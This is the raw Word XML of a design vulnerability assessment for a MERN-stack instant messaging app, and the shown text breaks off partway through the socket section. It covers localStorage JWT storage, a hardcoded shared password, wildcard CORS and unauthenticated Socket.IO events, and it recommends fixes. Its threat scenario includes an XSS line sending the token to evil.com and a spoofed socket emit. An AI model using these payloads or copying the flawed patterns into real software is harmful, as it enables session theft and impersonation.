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after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="646464"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Real-Time Instant Messaging System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="56"/>
        </w:rPr>
        <w:t>Critical &amp; High-Risk Areas of the Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="646464"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Design Vulnerability Assessment &amp; Mitigation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="646464"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MERN Stack (MongoDB, Express.js, React, Node.js) + Socket.IO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Author: IM Project Development Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Date: September 23, 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="969696"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[Right-click here and select 'Update Field' to generate Table of Contents]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Deliverable:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical Risk Analysis &amp; Design Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>System Under Analysis:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Real-Time Instant Messaging Application (MERN Stack with WebSockets)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Scope:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identification, analysis, and mitigation recommendations for high-risk architectural and implementation decisions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Purpose</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document identifies and formally analyzes the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>critical and high-risk areas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the Instant Messaging (IM) system's architecture and implementation. The objective is to demonstrate awareness of design trade-offs, document known vulnerabilities, assess their potential impact, and propose targeted mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Methodology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each risk area is analyzed using the following structured framework:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Identification:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Description of the vulnerable component or design decision. 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Specific code references and implementation patterns that exhibit the risk. 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Threat Scenario:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concrete attack vectors or failure modes that could exploit the vulnerability. 4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Impact Assessment:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Severity classification based on Likelihood × Impact. 5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Current Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Any existing safeguards already present in the codebase. 6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Recommended Mitigation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Proposed improvements to reduce or eliminate the risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Severity Classification Scale</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Description</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Critical</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Immediate threat to data integrity or security; exploitation is straightforward</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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High</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Medium-High</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Significant threat requiring active exploitation; can cause major damage</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Medium</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Degradation of service or data quality under specific conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Low</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Low-Medium</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Minor inconvenience; mitigated by existing framework defaults</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Risk Area 1: Authentication &amp; Session Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟠 HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The authentication system presents three distinct vulnerabilities related to session token storage, credential management, and cross-origin request policies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability A — JWT Storage in `localStorage`:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The frontend application stores the JSON Web Token (JWT) in the browser's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, which is accessible by any JavaScript code executing within the same origin:</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Frontend: Upon successful login, the token is stored as:</w:t>
        <w:br/>
        <w:t>localStorage.setItem("userInfo", JSON.stringify(data));</w:t>
        <w:br/>
        <w:br/>
        <w:t>// And retrieved for API calls as:</w:t>
        <w:br/>
        <w:t>const userInfo = JSON.parse(localStorage.getItem("userInfo"));</w:t>
        <w:br/>
        <w:t>// token is then sent via: Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fully accessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to client-side JavaScript. If an attacker injects malicious JavaScript via a Cross-Site Scripting (XSS) attack, they can read the token and impersonate the user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability B — Hardcoded Password for Quick Connect Users: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userControllers.js, line 176-177:</w:t>
        <w:br/>
        <w:t>user = await User.create({</w:t>
        <w:br/>
        <w:t xml:space="preserve">    username: cleanUsername,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    name: displayName,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    password: "QuickConnectPassword123!",  // Hardcoded, identical for ALL quick-connect users</w:t>
        <w:br/>
        <w:t xml:space="preserve">    isQuickConnect: true,</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every user created through the Quick Connect flow shares the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>same password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. If this password is discovered (e.g., through source code review, reverse engineering, or social engineering), an attacker could log in as any Quick Connect user through the standard login endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability C — Unrestricted CORS Policy:</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 line 18:</w:t>
        <w:br/>
        <w:t>res.header("Access-Control-Allow-Origin", "*");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The wildcard </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>any website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the internet to send authenticated requests to the API. A malicious website could craft requests to the IM server while the user is logged in, potentially accessing their conversations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Threat Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. An attacker discovers an XSS vector (e.g., unescaped user input rendered in the DOM). 2. The attacker injects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;fetch('https://evil.com/steal?token=' + localStorage.getItem("userInfo"))&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. 3. The attacker now possesses the victim's JWT and can impersonate them for the token's entire lifetime. 4. Combined with the wildcard CORS policy, the attacker's website can directly call the IM API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Current Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>- JWT tokens are generated with a secret key (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>JWT_SECRET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), providing signature verification. - React's default JSX rendering escapes HTML entities, reducing (but not eliminating) XSS vectors. - The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>protect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authMiddleware.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> validates the JWT signature on every protected request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.5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Store JWT in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>httpOnly</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Secure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SameSite=Strict</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> cookies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Critical</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Implement token expiration with refresh token rotation</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Generate unique random passwords for Quick Connect users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Restrict CORS to specific frontend domain(s)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Content Security Policy (CSP) headers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bl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Risk Area 2: Socket.IO Event Integrity &amp; Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity: 🟠 HIGH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The WebSocket layer (Socket.IO) does not implement server-side authentication or authorization for incoming socket connections and events. Any client that can establish a WebSocket connection can emit events with arbitrary payloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vulnerability A — No Socket Authentication:</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 — Socket connection handler:</w:t>
        <w:br/>
        <w:t>io.on("connection", (socket) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    socket.on("setup", async (userData) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if (!userData || !userData._id) return;</w:t>
        <w:br/>
        <w:t xml:space="preserve">        const userId = userData._id.toString();</w:t>
        <w:br/>
        <w:t xml:space="preserve">        socket.userId = userId;              // Server trusts client-provided userId</w:t>
        <w:br/>
        <w:t xml:space="preserve">        socketToUser.set(socket.id, userId);</w:t>
        <w:br/>
        <w:t xml:space="preserve">        socket.join(userId);                 // Joins the user's private room</w:t>
        <w:br/>
        <w:t xml:space="preserve">    });</w:t>
        <w:br/>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>setup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> event accepts a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>userData</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object directly from the client </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without any JWT verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. A malicious client could send:</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socket.emit("setup", { _id: "victimUserId123" });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
